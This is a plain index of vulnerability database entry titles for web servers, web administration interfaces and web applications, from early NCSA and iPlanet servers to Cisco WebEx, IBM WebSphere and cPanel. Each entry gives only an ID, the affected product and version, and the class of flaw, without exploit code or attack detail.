[19450] phpWebSite 0.8.3 IMG Tag cross site scripting
[19300] Netscape Enterprise Server 3.x/4.x Web Publishing Feature denial of service
[19222] Microsoft Office Web Components 10 DataSourceControl ConnectionFile information disclosure
[19221] Microsoft Office Web Components 10 Spreadsheet File information disclosure
[19220] Microsoft Office Web Components 9/10 Chart Load File information disclosure
[19190] iPlanet Web Server up to 4.x SP11 Admin Server cross site scripting
[19189] iPlanet Web Server up to 4.x SP11 Admin Server cross site scripting
[19149] Oracle9i up to Release 2 9.2.2 iSQL *Plus Web Application memory corruption
[19145] Northern Xeneo Web Server up to 2.1.0.0 Encoded URL denial of service
[19140] Peter Sandvik Simple Web Server up to 0.5.1 HTTP Request privilege escalation
[19136] Microsoft IIS 5.0/5.1 WebDAV Memory denial of service
[19123] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 HTTP Request helpout.exe denial of service
[19122] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 Header cross site scripting
[19121] IBM Websphere Caching Proxy Server up to 3.6/4.0.1.26 HTTP GET Request cross site scripting
[19104] Radiobird Software Webserver 4 All up to 1.27 URL Encoding directory traversal
[19103] Radiobird Software Webserver 4 All up to 1.22 HTTP GET Request memory corruption
[19087] Microsoft SQL Server up to 7.0 Stored Procedure xp_runwebtask privilege escalation
[19085] Symantec Enterprise Firewall up to 7.0 Web Proxy denial of service
[19071] IBM WebSphere Application Server 4.0.3 HTTP Header memory corruption
[19065] HP Procurve Switch 4000M up to C.09.15 HTTP Administration Interface denial of service
[19038] phpWebSite 0.8.2 modsecurity.php Source information disclosure
[19036] Funsoft Dinos Webserver 2.1 Encoded URL directory traversal
[19012] Cisco VPN 3000 Concentrator up to 3.5.2 HTML Login Interface denial of service
[19005] Cisco VPN 3000 Concentrator up to 3.0.3 HTML Interface denial of service
[18993] Aprelium Technologies Abyss Web Server 1.0.3 Administration Console File information disclosure
[18992] Aprelium Technologies Abyss Web Server up to 1.0.2 Administration Console srvstatus.chl privilege escalation
[18991] Aprelium Technologies Abyss Web Server 1.0.3 directory traversal
[18990] Aprelium Technologies Abyss Web Server 1.0.3 HTTP Request Directory information disclosure
[18989] Ipswitch IMail up to 7.1 Web Calendaring Service denial of service
[18979] T. Hauck Jana Web Server up to 1.4.6 POP3 Server memory corruption
[18978] T. Hauck Jana Web Server up to 1.4.6/2.2.1 Authentication weak authentication
[18977] T. Hauck Jana Web Server up to 1.4.6/2.2.1 User information disclosure
[18976] T. Hauck Jana Web Server up to 1.4.6/2.2.1 FTP Server denial of service
[18975] T. Hauck Jana Web Server up to 1.4.6/2.2.1 memory corruption
[18974] T. Hauck Jana Web Server up to 1.4.6/2.2.1 HTTP memory corruption
[18956] Sun One Web Server 4.1 SP9/6.0 SP2 Search Engine directory traversal
[18954] IBM AIX 4.x WebSecure Configuration Utility unknown vulnerability
[18946] Key Focus KF Web Server up to 1.0.5 HTTP Header memory corruption
[18945] Key Focus KF Web Server 1.0.2 HTTP Request File information disclosure
[18944] BEA WebLogic Server 5.1.x Performance Pack denial of service
[18917] MyWebServer 1.0.1/1.0.2 HTTP GET Request memory corruption
[18902] ACI 4D Webserver 6.7.3 HTTP Request memory corruption
[18837] BlueFace Falcon Web Server up to 2.0.0.1021 privilege escalation
[18797] Savant Web Server up to 3.1 GET Request memory corruption
[18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation
[18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure
[18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation
[18728] MyWebServer 1.0.2 Error Message cross site scripting
[18727] MyWebServer 1.0.2 memory corruption
[18721] Iplanet Web Server 4.1 Chunked Encoding Transfer memory corruption
[18673] Critical Path Injoin Directory Server 4.0 iCon Administrative Web Server cross site scripting
[18672] Critical Path Injoin Directory Server 4.0 iCon Administrative Web Server information disclosure
[18670] Lysias Lidik Webserver 0.7b Web Server directory traversal
[18643] Webmin/Usermin 0.96 Authentication weak authentication
[18642] Webmin/Usermin 0.96 Error cross site scripting
[18549] Apache Tomcat Security web.xml 7PK Security Features
[18498] Microsoft IIS 5.0/5.1 WebDAV IP Address information disclosure
[18468] Xerver Web Server up to 2.10 HTTP Request denial of service
[18467] Xerver Web Server up to 2.10 GET Request directory traversal
[18429] Iplanet Web Server 4.1 memory corruption
[18425] Goahead Webserver 2.1.1/2.1.2/2.1.3/2.1.4/2.1.5 404 Error Message cross site scripting
[18424] Goahead Webserver 2.1.1/2.1.2/2.1.3/2.1.4/2.1.5 Encoded URL directory traversal
[18376] Deep Forest Software Quik-Serv Webserver 1.1B URL directory traversal
[18375] IBM Informix Web Datablade 4.12 Escape sql injection
[18374] IBM Informix Web Datablade 4.12 webdriver sql injection
[18363] Aprelium Technologies Abyss Web Server up to 1.0.0.1 URL Encoding directory traversal
[18326] Novell GroupWise 5.5 HTTP Request GWWEB.EXE Path information disclosure
[18308] Nombas Scriptease Webserver URL comment2.jse File information disclosure
[18298] Essen Essentia Web Server 2.1 URL memory corruption
[18297] Essen Essentia Web Server 2.1 URL directory traversal
[18275] WebTrends Reporting Center 4.0d GET Request get_od_toc.pl Path information disclosure
[18274] WebTrends Reporting Center 4.0d GET Request WTRS_UI.EXE memory corruption
[18257] ACI 4D Webserver 6.7.3 Basic Authentication memory corruption
[18242] Caldera OpenUnix 8.0 webtop service_action.cgi privilege escalation
[18229] Nombas ScriptEase Webserver 0.95 GET Request denial of service
[18228] Nombas ScriptEase Webserver 0.95 URL memory corruption
[18222] Funsoft Dinos Webserver 1.2 HTTP Request memory corruption
[18220] Bbshareware.com Phusion Webserver 1.0 HTTP Request memory corruption
[18219] Bbshareware.com Phusion Webserver 1.0 directory traversal
[18206] BlueFace Falcon Web Server up to 2.0.0.1020 Authentication privilege escalation
[18162] Netgear RT311/RT314 3.22 Administration Interface cross site scripting
[18143] Oracle Application Server Web Cache 2.0.0.2 memory corruption
[18107] Cyberstop Web Server 0.1 GET Request memory corruption
[18106] Cyberstop Web Server 0.1 MS DOS Device Name denial of service
[18021] MDG 4D Webserver 3.5.3 URL directory traversal
[18020] MDG 4D Webserver up to 3.5.3 HTTP Request memory corruption
[18008] Funsoft Dinos Webserver up to 1.2 URL directory traversal
[18003] BEA WebLogic Server 6.1 MS DOS Device Name denial of service
[17999] Oracle Application Server Web Cache 2.0.0.x TCP Request denial of service
[17996] Michael Lamont Savant Webserver 3.0 HTTP Request Encoding memory corruption
[17936] Goahead Webserver up to 2.1.7 Source information disclosure
[17912] Novell Web Server 2.0 Examples Toolkit files.pl privilege escalation
[17899] Nombas Scriptease Webserver up to 5.0 viewcode.jse directory traversal
[17831] Macromedia JRun 3.1 JavaServer Pages WEB-INF/META-INF privilege escalation
[17789] Cherokee httpd up to 0.2.7 Web Server directory traversal
[17751] Webmin 0.91 edit_action.cgi directory traversal
[17738] IBM Tivoli Secureway Policy Director 3.8 WebSeal denial of service
[17705] Lotus Domino Web Server 5.x Default Navigator information disclosure
[17694] Oracle Application Server Web Cache 2.0.0.1 GET Request memory corruption
[17662] Microsoft Exchange 5.5 Outlook Web Access privilege escalation
[17618] IBM Informix Web Datablade up to 4.12 ifx directory traversal
[17604] Microsoft IIS 3.0/4.0/5.0 Web Log Entry weak authentication
[17571] Microsoft Exchange 5.5 Outlook Web Access User information disclosure
[17524] Trend Micro Interscan Webmanager 1.2 Manager HttpSave.dll memory corruption
[17511] Iplanet Web Server up to 4.1 HTTP Method memory corruption
[17510] Iplanet Web Server up to 4.1 URI memory corruption
[17507] OReilly Webboard 4.10.30 Paging denial of service
[17494] Novell GroupWise 5.5/6.0 webacc directory traversal
[17491] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Web Calendar memory corruption
[17485] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Web Messaging Server privilege escalation
[17408] WebTrends Enterprise Reporting Server 3.1c/3.5 URL privilege escalation
[17370] Microsoft IIS 5.0 WebDAV denial of service
[17367] IBM WebSphere Commerce Suite up to 3.53 Session ID Cookie weak authentication
[17277] ACI 4D Webserver 6.5.7 Request directory traversal
[17269] Cisco IOS 11/12.0 Management Interface denial of service
[17242] Trend Micro Virus Buster up to 3.5.4 cgiWebupdate.exe File information disclosure
[17225] Sun iPlanet Web Server 4.x on HP-UX HTTPS Service denial of service
[17188] Novell GroupWise 5.5 WebAccess Directory information disclosure
[17168] T. Hauck Jana Web Server up to 2.01 MS DOS Device Name /aux denial of service
[17167] T. Hauck Jana Web Server up to 1.46 Hex Encoded URL handler directory traversal
[17145] Sixhead SIX-webboard 2.01 generate.cgi privilege escalation
[17134] Orange Web Server 2.1 GET Request denial of service
[17127] Roxen Webserver 2.0/2.1 Encoded URL privilege escalation
[17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting
[17036] phpWebSite 0.7.9 Domain privilege escalation
[16943] Iplanet iPlanet Web Server 4.x unknown vulnerability
[16926] IBM WebSphere Application Server up to 3.1.2 macro.d2w denial of service
[16925] IBM WebSphere Application Server 3.1.2 macro.d2w Path information disclosure
[16922] Goahead Software Webserver 2.1 HTTP Request /aux denial of service
[16919] iPlanet Web Server 4.1 Host Header information disclosure
[16917] Microsoft ISA Server 2000 Web Proxy denial of service
[16911] vWebServer 1.2.0 URL memory corruption
[16910] vWebServer 1.2.0 MS DOS Device Name denial of service
[16909] vWebServer 1.2.0 ASP Script Source information disclosure
[16901] Netcruiser Web Server up to 0.1.2.8 URL Path information disclosure
[16889] K5n Webcalendar up to 0.9.26 privilege escalation
[16877] Spencer Christensen Perl Web Server 0.3 URL directory traversal
[16866] Sentraweb Indexu 1.0/1.1/2.0beta Authentication weak authentication
[16850] Mirabilis ICQ 2000.0b Build3278 WebFront Plug-in denial of service
[16805] IBM WebSphere Commerce Suite 4.0.1 Source information disclosure
[16804] Michael Lamont Savant Webserver 3.0 Host Header memory corruption
[16794] Sun Javaserver Web Dev Kit 1.0.1 /WEB-INF directory traversal
[16762] iPlanet Web Server 4.0 denial of service
[16746] IBM WebSphere Plugin on Netscape Enterprise HTTP Request Source information disclosure
[16729] Netscape Enterprise Server 3.0/4.0 Web Publishing Feature Directory information disclosure
[16709] Microsoft IIS 5.0 WebDAV Request denial of service
[16695] Beck IPC IPC@CHIP Embedded-Webserver FTP/Telnet Service weak authentication
[16693] Beck IPC IPC@CHIP Embedded-Webserver chipcfg.cgi information disclosure
[16692] Beck IPC IPC@CHIP Embedded-Webserver Telnet Service privilege escalation
[16691] Beck IPC IPC@CHIP Embedded-Webserver Telnet Server User information disclosure
[16689] Beck IPC IPC@CHIP Embedded-Webserver privilege escalation
[16687] Beck IPC IPC@CHIP Embedded-Webserver HTTP Request denial of service
[16674] IBM Websphere Commerce Suite up to 4.1.1 Report orderdspc.d2w sql injection
[16627] Goahead Webserver V.2.0/V.2.1 GET Request directory traversal
[16626] Biblioscape Biblioweb Server 2.0 GET Request memory corruption
[16625] Biblioscape Biblioweb Server 2.0 GET Request directory traversal
[16612] Free Java Web Server 1.0 directory traversal
[16610] Macromedia JRun 3.0 /WEB-INF/web.xml information disclosure
[16550] IBM WebSphere Application Server 1.3.x Fast Response Cache Accelerator AfpaCache denial of service
[16427] BEA WebLogic Server up to 5.1.0 URL memory corruption
[16374] Netscreen ScreenOS 1.73 r1/2.1 r6/2.5 r1/2.10 r3 WebUI memory corruption
[16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation
[16366] WatchGuard SOHO Firewall 1.6/2.1.3 Administration Interface privilege escalation
[16274] 24Link Web Server 1.06 GET Request privilege escalation
[16254] SonicWALL SOHO Firewall 4.0/5.0 Web Access denial of service
[16253] SonicWALL SOHO Firewall 4.0/5.0 Web Server denial of service
[16223] BEA WebLogic Server 5.1 Restrictions privilege escalation
[16150] Samba 2.0.7 Web Administration Tool denial of service
[16149] Samba 2.0.7 Web Administration Tool User information disclosure
[16148] Samba 2.0.7 Web Administration Tool weak authentication
[16131] Boa Webserver 0.94.8.2 Get Effective Rights Engine directory traversal
[16097] Mirabilis ICQ Web Front Server URL guestbook.cgi denial of service
[16096] Sun iPlanet Web Server 4.x SHTML Logger memory corruption
[16042] Alt-N MDaemon 3.1.1 WebConfig memory corruption
[16000] Apache HTTP Server 1.3.12 on SuSE Linux WebDAV Directory information disclosure
[15979] IBM WebSphere Application Server 3.0.2 Host Header memory corruption
[15973] SCO UnixWare 7.0 scohelphttp Web Server /search97cgi/vtopic directory traversal
[15956] Ipswitch IMail 6.00 Web Service denial of service
[15953] Sun Java System Web Server up to 2.0 com.sun.server.http.pagecompile.jsp92.jspservlet privilege escalation
[15874] Jeremy Arnold Worm Webserver 1.0 URL denial of service
[15873] Jeremy Arnold Worm Webserver 1.0 directory traversal
[15839] Sun Solaris Answerbook2 up to 1.4.2 dwhttpd Web Server privilege escalation
[15838] Sun Solaris Answerbook2 up to 1.4.4 dwhttpd Web Server privilege escalation
[15826] BEA WebLogic Server 3.1.8/4.0.4/4.5.1 JSP Servlet privilege escalation
[15825] BEA WebLogic Server up to 5.1.x SSI Servlet Source information disclosure
[15824] BEA WebLogic Server up to 5.1.x File Servlet /ConsoleHelp/ Source information disclosure
[15823] BEA WebLogic Server up to 5.1.x Proxy Plugin memory corruption
[15791] IBM WebSphere Application Server 2.0/3.0/3.0.2.1 Invoker Servlet /servlet/file privilege escalation
[15790] Roxen Webserver 2.0.x URL privilege escalation
[15758] Sun Java System Web Server up to 2.0 JSP Compiler Servlet board.html privilege escalation
[15745] Michael Lamont Savant Webserver 2.1/3.0 GET Request privilege escalation
[15734] West Street LocalWEB HTTP Server 1.2.0 GET Request denial of service
[15687] BEA WebLogic Server up to 5.1.0 URL /file/ privilege escalation
[15647] BEA WebLogic Server up to 4.5.1 JSP File Source information disclosure
[15645] IBM WebSphere Application Server 3.0.2 JSP File Source information disclosure
[15625] Michael Lamont Savant WebServer 2.1 GET Request Source information disclosure
[15618] Concatus IMate Webmail Server 2.5 HELO Command memory corruption
[15566] Cayman 3220-H DSL Router 1.0 Administration Interface denial of service
[15395] Atrium Software Mercur Mail Server 3.20.01 WebView WebMail-Client memory corruption
[15392] Oracle Application Server 4.0 on Win NT Web Listener /ows-bin privilege escalation
[15388] Netscape Enterprise Server 3.5/3.6 on Solaris Web Publishing /publisher Directory information disclosure
[15340] iPlanet Web Server 4.1 HTTP GET denial of service
[15316] Zeus Technologies Zeus Web Server up to 3.3.5 String Source information disclosure
[15197] National Science Foundation Squid Web Proxy up to 2.2.STABLE5 weak authentication
[15127] Webmin up to 0.42 Authentication weak authentication
[15107] Michael Lamont Savant WebServer 2.0 URL denial of service
[15072] Novell GroupWise 5.2/5.5 gwweb.exe Path information disclosure
[15071] Novell GroupWise 5.2/5.5 gwweb.exe directory traversal
[14994] Sun Java Webserver privilege escalation
[14981] Tektronix Phaser Network Printer 740/750/840/930 Webserver ncl_subjects.html privilege escalation
[14957] F5 BIG-IP 2.0 Configuration Interface bigconf.conf privilege escalation
[14922] Falcon Falcon Web Server 1.0.0.1006 Path information disclosure
[14918] BlueFace Falcon Web Server 1.0.1006 directory traversal
[14916] Zeus Technologies Zeus Web Server 3.3.1/3.3.2 Search Engine privilege escalation
[14915] IBM WebSphere ikeyman Tool weak encryption
[14896] T. Hauck Jana Web Server up to 1.46 directory traversal
[14895] T. Hauck Jana Web Server up to 1.46 directory traversal
[14894] Roxen Web Server 1.3.11 RXML Parser htmlparse.pike denial of service
[14883] Sambar Web Server 4.2.1 HTTP GET memory corruption
[14695] Novell NetWare 4.1/4.11 Novell-HTTP-Server/YAWN Web Server denial of service
[14596] Mirabilis ICQ 99a 2.13build1700 Webserver directory traversal
[14564] Cisco Router 3.2/4.2 Web Server privilege escalation
[14553] Ipswitch IMail 5.0/6.0 Web Service memory corruption
[14546] Ramp Networks WebRamp Router HTTP Server denial of service
[14536] Microsoft Frontpage/Personal Web Server URL privilege escalation
[14533] Cisco Router Web Server denial of service
[14457] Ramp Networks WebRamp Router M3 Administration privilege escalation
[14420] Linux Kernel RPC Interface Configuration
[14355] Router Administration Interface weak authentication
[14311] Microsoft Windows NT Web Server information disclosure
[14309] JavaWebServer CGI Program privilege escalation
[13983] Oracle Webserver 1.0/2.1 Permission privilege escalation
[13934] Web Server Authentication weak authentication
[13885] SGI IRIX up to 6.3 webdist.cgi privilege escalation
[13740] Novell Web Server 1.0/2.x convert.bas privilege escalation
[13727] NCSA Webserver 1.5 phf privilege escalation
[13697] NCSA Webserver 1.3/1.4/1.4.1 memory corruption
[13696] NCSA Webserver 1.5c memory corruption
[13582] Horde Webmail up to 2.0.5 Horde_ldap weak authentication
[13575] Cisco WebEx Meetings Server 1.5 Password privilege escalation
[13570] Cisco Email Security/Web Security 8.3 monitor/reports/overview cross site scripting
[13477] Cisco WebEx Meeting Server 1.5 p.php User Name privilege escalation
[13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation
[13406] Cisco ASA up to 8.4.7/9.1.4 WebVPN Login Page /+CSCOE+/logon.html cross site scripting
[13382] Usermin/Webmin up to 1.590 Popup Window cross site scripting
[13380] cPanel 11.40.1.13/11.42.1.15/11.43.0.11 Interfaces cross site scripting
[13351] IBM Sametime Proxy Server 9.0/9.0.0.1 Web Player cross site request forgery
[13340] IBM WebSphere Portal 6.1.0/7.0/8.0 googlemap.jsp cross site scripting
[13339] IBM WebSphere Portal 6.1.0/7.0/8.0 cross site scripting
[13338] IBM WebSphere Portal 6.1.0/7.0/8.0 JSP Include privilege escalation
[13337] IBM WebSphere Portal 6.1.0/7.0/8.0 boot_config.jsp cross site scripting
[13336] IBM WebSphere Portal 6.1.0/7.0/8.0 FilterForm.jsp cross site scripting
[13335] IBM WebSphere Portal 6.1.0/7.0/8.0 Web Access denial of service
[13248] IBM WebSphere Application Server up to 6.1.0.47/6.0.2.43 TLS denial of service
[13242] Cisco WebEx up to 27.32.31.15/28.12.13.17/29.5.1.11 Event Center meetinginfo.do information disclosure
[13175] IBM WebSphere MQ up to 7.5.0.3 TCP Listener inetd denial of service
[13174] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption
[13173] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption
[13172] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 WRF Player memory corruption
[13171] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 ARF Player memory corruption
[13170] Cisco WebEx Player up to T27.32.15/T28.11/T29.1 WRF/ARF Player memory corruption
[13105] Cisco WebEx Meetings Server cross site request forgery
[13004] Apple CUPS 1.6.4/1.7.1 Interface cross site scripting
[12969] Oracle Secure Global Desktop 4.63/4.71/5.0/5.1 Workspace Web Application memory corruption
[12966] Oracle Secure Global Desktop 5.0/5.1 Workspace Web Application memory corruption
[12898] Oracle Access Manager 11.1.1.5 Webserver Plugin denial of service
[12897] Oracle Access Manager up to 11.1.2.2.0 WebGate unknown vulnerability
[12890] Oracle WebCenter Portal 11.1.1.7/11.1.1.8 People Connection unknown vulnerability
[12882] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 WLS Security unknown vulnerability
[12874] Juniper Junos up to 13.3 J-Web index.php Persistent cross site scripting
[12873] Juniper Junos up to 12.2 J-Web index.php cross site scripting
[12821] Horde Webmail 5.1 Redirect /horde/util/go.php privilege escalation
[12816] cPanel 11.38.2/11.40.1/11.42.0 Modify Account Interface privilege escalation
[12807] cPanel 11.38.2/11.40.1/11.42.0 wwwacct Interface /scripts5/wwwacct privilege escalation
[12783] Cisco Web Security Appliance 7.1.0/7.5/7.7 privilege escalation
[12779] Cisco Unity Connection up to 8.6(2)SU3 Web Inbox cross site scripting
[12744] IBM WebSphere Portal up to 8.0.0.1 CF10 WCM UI cross site scripting
[12743] IBM WebSphere Portal up to 8.0.0.1 CF10 Render Engine cross site scripting
[12717] PayPal App 5.3 on Android SSL Certificate WebHybridClient.java weak authentication
[12673] Cisco ASA 8.0/9.0 WebVPN Login Page denial of service
[12672] Cisco WebEx Meeting Center HTTP GET information disclosure
[12637] Webmin up to 1.670 /webminlog/view.cgi Reflected cross site scripting
[12616] TP-LINK TL-R600VPN v2 Web CLI unknown vulnerability
[12608] McAfee Web Gateway up to 7.4.0/up to 7.3.2.4/up to 7.2.0.9 Web Filtering Port Dot Dot Sequence directory traversal
[12517] Citrix Netscaler 9.3/10.0/10.1 AAA TM vServer User Interface cross site scripting
[12508] Cisco CVR100W/RV110W/RV215W Management Interface privilege escalation
[12494] Cisco Wireless LAN Controller 4.0/5.0/6.0/7.0 WebAuth Login denial of service
[12356] Cisco Unified SIP Phone Test Interface privilege escalation
[12354] Cisco Unified Communications Manager 10.0(1.10000.3) Administration Interface privilege escalation
[12353] Cisco Unified Communications Manager 10.0(1.10000.3) Real Time Monitoring Tool Web Application weak authentication
[12350] Cisco Unified Communications Manager 10.0(1.10000.3) IP Manager Assistant Interface cross site scripting
[12346] Drupal 6.x-3.2/6.x-3.18 Webform Module cross site scripting
[12330] Cisco Secure Access Control System RMI Interface Arbitrary File Read privilege escalation
[12315] SAP NetWeaver up to 7.30 WebDyn Pro Portal information disclosure
[12308] Joomla CMS 3.2.1 weblinks-categories sql injection
[12289] Cisco Unified Communications Manager IP Manager Assistant Interface cross site scripting
[12288] Cisco Unified Communications Manager Bulk Administration Interface privilege escalation
[12287] Cisco Unified Communications Manager Java Database Interface sql injection
[12275] cPanel 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 WHM Interface /scripts/park directory traversal
[12270] Symantec Web Gateway 5.1.1 sql injection
[12269] Symantec Web Gateway 5.1.1 cross site scripting
[12233] Palo Alto PAN-OS 5.0.9/5.1.4 Device Management Interface privilege escalation
[12156] Cisco WebEx Meetings Server 1.0/1.1 Account Activation privilege escalation
[12155] Cisco WebEx 11.0 SPI Call Arbitrary File Enumeration privilege escalation
[12153] Cisco WebEx Social up to 3.4(1) Authentication Session Hijacking cross site request forgery
[12152] Cisco WebEx Meetings Server 1.0 Event Center Module Password and Host Keys weak authentication
[12151] Cisco WebEx 4.1 Certificate privilege escalation
[12150] Cisco WebEx Social 3.0(1) Post URL cross site scripting
[12149] Cisco WebEx Social Input Field privilege escalation
[12148] Cisco WebEx Meetings Server/WebEx Node Uninitialized Memory privilege escalation
[12147] Cisco WebEx User Input Sanitizer privilege escalation
[12129] Allegro RomPager Embedded Web Server /rom-0 information disclosure
[12091] Cisco WebEx Meetings Server Authorization privilege escalation
[12082] Cisco Secure Access Control System Portal Interface privilege escalation
[11991] Cisco WebEx Meetings Server 1.5/1.5.1.6/1.5.1.131 Enterprise License Manager Web Portal Cleartext Password privilege escalation
[11990] Cisco Secure Access Control System up to 5.4 Remote Method Invocation Interface privilege escalation
[11968] IBM WebSphere Application Server up to 7.0.0.30 simpleFileServlet information disclosure
[11967] IBM WebSphere Application Server 7.0.0.30 Web Service Endpoint privilege escalation
[11966] IBM WebSphere Application Server up to 7.0.0.29/up to 8.0.0.8/8.5.5.1/8.5 Administrative Console Reflected cross site scripting
[11923] Oracle Secure Global Desktop up to 4.63 Administration Console/Workspace Web Applications information disclosure
[11916] Oracle Solaris 10 Java Web Console unknown vulnerability
[11856] Oracle PeopleSoft Enterprise PeopleTools 8.52/8.53 Portal - Web Services unknown vulnerability
[11830] Oracle iPlanet Web Proxy Server 4.0 Administration unknown vulnerability
[11827] Oracle iPlanet Web Server 6.1/7.0 Security weak encryption
[11826] Oracle iPlanet Web Proxy Server 4.0 Security weak encryption
[11821] Oracle HTTP Server 11.1.1.6.0/11.1.1.7.0/11.1.2.1 Web Listener cross site scripting
[11819] Oracle WebCenter Portal 11.1.1.6.0/11.1.1.7.0/11.1.1.8.0 Page Service unknown vulnerability
[11814] Oracle HTTP Server 11.1.1.6.0/11.1.1.7.0/11.1.2.1/12.1.2.0 Web Listener weak encryption
[11810] Oracle WebCenter Sites 11.1.1.6.1/11.1.1.8.0 WebCenter Sites Community Configuration
[11771] FFmpeg 2.1 libavformat/webvttdec.c webvtt_read_header unknown vulnerability
[11638] Courier MTA Webmail Server 0.73 External File System denial of service
[11635] Plone up to 4.2 Admin Interface privilege escalation
[11620] cPanel WHM 11.36.2.9/11.38.2.12/11.40.0.28/11.40.1.2 Edit DNS Zone Interface cross site scripting
[11575] IBM WebSphere Portal 8.0.0/8.0.0.1 Content Template Catalog administrative PAA Installation/Execution privilege escalation
[11574] IBM WebSphere Portal 8.0.0.1 Referenced WCM Components privilege escalation
[11573] IBM WebSphere Portal up to 7.0.0.2/8.0.0.1 Taxonomy Individual Categories privilege escalation
[11572] IBM WebSphere Portal up to 6.1.0.5/6.1.5.3/7.0.0.1/8.0.0.1 Reflected cross site scripting
[11562] IBM WebSphere Portal up to 6.1.5.3/7.0.0.2/8.0.0.1 Web Content Manager privilege escalation
[11561] Synology DiskStation Manager 4.0-2257/4.1-2851/4.2-3236/4.3-3810 SliceUpload webman/imageSelector.cgi privilege escalation
[11521] IBM WebSphere Service Registry/Repository up to 8.0.0.2 Widgets cross site scripting
[11485] TYPO3 up to 6.1.6 Backend User Administration Interface Reflected cross site scripting
[11457] Microsoft SharePoint Server/Office Web Apps 2010 SP1/2010 SP2/2013 W3WP Service Account privilege escalation
[11216] IBM WebSphere Application Server up to 8.5.5.0 cross site scripting
[11215] IBM WebSphere Application Server up to 8.5.5.0 Administrative Console Reflected cross site scripting
[11214] IBM WebSphere Application Server up to 8.5.5.0 Reflected cross site scripting
[11212] IBM WebSphere Application Server up to 8.0.0.7 Migration Functionality privilege escalation
[11177] IBM WebSphere Portal up to 8.0 URL information disclosure
[11172] IBM WebSphere Portal 8.0.0/8.0.0.1 Reflected cross site scripting
[11171] IBM WebSphere Portal up to 8.0.0.1 Reflected cross site scripting
[11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error
[11125] IBM Lotus Sametime WebPlayer 8.5.2/8.5.2.1 Sametime Audio Visual memory corruption
[11114] Joomla CMS 2.5.14 Web Links Form com_weblinks cross site scripting
[11109] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site request forgery
[11108] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site scripting
[11107] IBM Domino 8.5.0/9.0.0.0 Web Application webadmin.nsf cross site scripting
[11042] Horde Groupware Webmail Edition 5.1.2 Authentication Manager horde/ingo/basic.php weak authentication
[11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
[11016] cPanel WHM up to 11.40.0.11 Configure Customer Contact Interface privilege escalation
[11007] cPanel WHM up to 11.40.0.11 Manage SSL Hosts Interface cross site request forgery
[10920] Apple Mac OS X up to 10.8 Kernel Socket Interface Numeric Error
[10885] D-Link Router DI/DIR/TM bin/webs RuntimeDiagnosticPing memory corruption
[10866] IBM WebSphere DataPower XC10 2.5.0 Access Control privilege escalation
[10865] IBM WebSphere DataPower XC10 2.1.0/2.5.0 Session weak authentication
[10857] VMware vCenter Server up to 5.0 Update 2 Web Client Server privilege escalation
[10856] IBM WebSphere Message Broker up to 8.0.0.3 XML Parser denial of service
[10827] Cisco WebEx Meetings Center Virtual Machine Deployment privilege escalation
[10807] Oracle Solaris 10 Java Web Console unknown vulnerability
[10749] Oracle 8.1/8.2/8.3 Web Access unknown vulnerability
[10744] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability
[10743] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability
[10742] Oracle Health Sciences InForm up to 5.0 SP1 Web unknown vulnerability
[10705] Oracle WebLogic Server 10.3.6.0/12.1.1.0 Web Container directory traversal
[10700] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0/11.1.1.8.0 Content Server unknown vulnerability
[10601] Cisco NX-OS Nexus 7000 Management Interface privilege escalation
[10310] SAP NetWeaver up to 7.30 Web Application directory traversal
[10307] VMware Zimbra Collection Suite 6.0.16 Web Application weak authentication
[10291] Juniper Junos Pulse Secure Access Service 7.1r14/7.2r10/7.3r5/7.4r2 SSL VPN Web Server cross site scripting
[10290] IBM WebSphere Application Server 6.1.0.45/7.0.0.23/8.0.0.4/8.5 privilege escalation
[10288] IBM WebSphere Application Server 8.5.5.1 Administrative Console cross site scripting
[10287] IBM WebSphere Application Server 8.5.5.1 XML privilege escalation
[10286] IBM WebSphere Application Server 8.5.5.1 Administrative Console cross site scripting
[10252] Synology DiskStation Manager 4.3-3776 webman/wallpaper.cgi unknown vulnerability
[10184] Cisco WebEx up to 28.4 WRF Player memory corruption
[10183] Cisco WebEx up to 28.4 WRF Player memory corruption
[10182] Cisco WebEx 27.11.26/27.21.10/27.25.10/27.32.1/28.0.0 ARF Player memory corruption
[10181] Cisco WebEx 27.11.26/27.21.10/27.25.10/27.32.1/28.0.0 ARF Player memory corruption
[10168] IBM WebSphere Application Server 6.1 on z/OS JAX-WS Web Services privilege escalation
[10103] IBM WebSphere Commerce up to 7.0.0.6 Search Feature privilege escalation
[10082] IBM WebSphere Commerce up to 7.0.0.7 Administration Console cross site scripting
[10081] IBM WebSphere Commerce up to 7.0.0.7 Organisation Administration Console cross site scripting
[10080] IBM WebSphere Commerce up to 7.0.0.7 Accelerator cross site scripting
[10075] IBM WebSphere 8.0.0.0/8.0.0.1/8.0.0.2 Extended Deployment Compute Grid information disclosure
[10055] IBM WebSphere Application Server up to 8.5 Administrative cross site scripting
[10054] IBM WebSphere Application Server up to 8.5 Administrative cross site scripting
[10032] IBM WebSphere Portal up to 8.0 Request privilege escalation
[9955] IBM WebSphere Portal 6.1/6.1.5/7.0/8.0 Themes cross site scripting
[9920] cPanel WHM 11.34.1.24/11.36.1.14/11.38.1.12/11.39.0.4 Web Host Manager WHM privilege escalation
